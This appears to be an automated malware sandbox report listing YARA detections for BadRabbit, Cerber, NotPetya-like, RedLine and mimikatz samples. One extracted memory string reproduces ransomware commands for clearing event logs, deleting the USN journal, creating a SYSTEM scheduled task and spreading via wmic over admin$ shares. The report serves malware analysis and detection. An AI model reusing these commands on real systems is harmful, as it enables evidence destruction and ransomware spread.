      Source: 40.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 4.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 27.0.5753.tmp.7ff7cef20000.2.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
      Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 40.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 58.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 4.2.Endermanch@BadRabbit.exe.1426458.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 10.2.Endermanch@BadRabbit.exe.dc6458.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 19.2.Endermanch@Cerber5.exe.1720000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 1.2.Endermanch@BadRabbit.exe.140f570.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 40.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 19.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 49.2.Endermanch@BadRabbit.exe.1586018.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 3.3.rundll32.exe.4c2ba0.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 19.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 32.2.Endermanch@BadRabbit.exe.1036698.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 58.2.Endermanch@Cerber5.exe.4de0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 3.2.rundll32.exe.4c2ba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 10.2.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 1.2.Endermanch@BadRabbit.exe.140f570.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 27.0.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 19.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 19.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 3.2.rundll32.exe.4c2ba0.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 3.2.rundll32.exe.444ff8.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 3.2.rundll32.exe.444ff8.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 47.2.rundll32.exe.5c4e70.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 47.2.rundll32.exe.5c4e70.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 40.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 3.3.rundll32.exe.4c2ba0.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 3.3.rundll32.exe.4c2ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 58.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 3.3.rundll32.exe.4c2ba0.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 58.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 58.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 32.2.Endermanch@BadRabbit.exe.1036698.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 40.2.Endermanch@Cerber5.exe.4dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 3.3.rundll32.exe.4c2ba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 27.2.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
      Source: 9.2.rundll32.exe.6b5050.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 9.2.rundll32.exe.6b5050.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 49.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 19.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 47.2.rundll32.exe.4200000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 47.2.rundll32.exe.4200000.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 58.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 3.2.rundll32.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 3.2.rundll32.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 9.2.rundll32.exe.4220000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 9.2.rundll32.exe.4220000.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 27.0.5753.tmp.7ff7cef20000.1.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 1.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 4.2.Endermanch@BadRabbit.exe.1426458.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 40.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 3.3.rundll32.exe.4c2ba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 40.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 19.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
      Source: 58.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
      Source: 9.2.rundll32.exe.6b5050.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 9.2.rundll32.exe.6b5050.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 47.2.rundll32.exe.5c4e70.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 47.2.rundll32.exe.5c4e70.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
      Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: 00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
      Source: 0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: 00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
      Source: 00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
      Source: Process Memory Space: rundll32.exe PID: 5364, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: Detects InfinityLock ransomware Author: ditekSHen
      Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: Cerber3 Author: pekeinfo
      Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
      Source: rundll32.exe, 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeCode function: 1_2_0132173C1_2_0132173C
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeCode function: 1_2_013230E31_2_013230E3
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeCode function: 1_2_0132201D1_2_0132201D
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeCode function: 1_2_013238401_2_01323840
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007BA83C3_2_007BA83C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007BC9403_2_007BC940
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007BB11D3_2_007BB11D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B27083_2_007B2708
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007BC1E33_2_007BC1E3
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B6A019_2_0040B6A0
      Source: C:\Windows\5753.tmpCode function: 27_2_00007FF7CEF25C0027_2_00007FF7CEF25C00
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B6A040_2_0040B6A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,3_2_007B9B63
      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe 630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_007B9534
      Source: irH9zMhZub.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
      Source: 00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
      Source: 0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 0000001B.00000000.303576856.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
      Source: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 0000001B.00000000.302953795.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
      Source: 00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
      Source: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: 00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
      Source: 0000001B.00000000.303401011.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
      Source: 00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
      Source: Process Memory Space: rundll32.exe PID: 5364, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
      Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
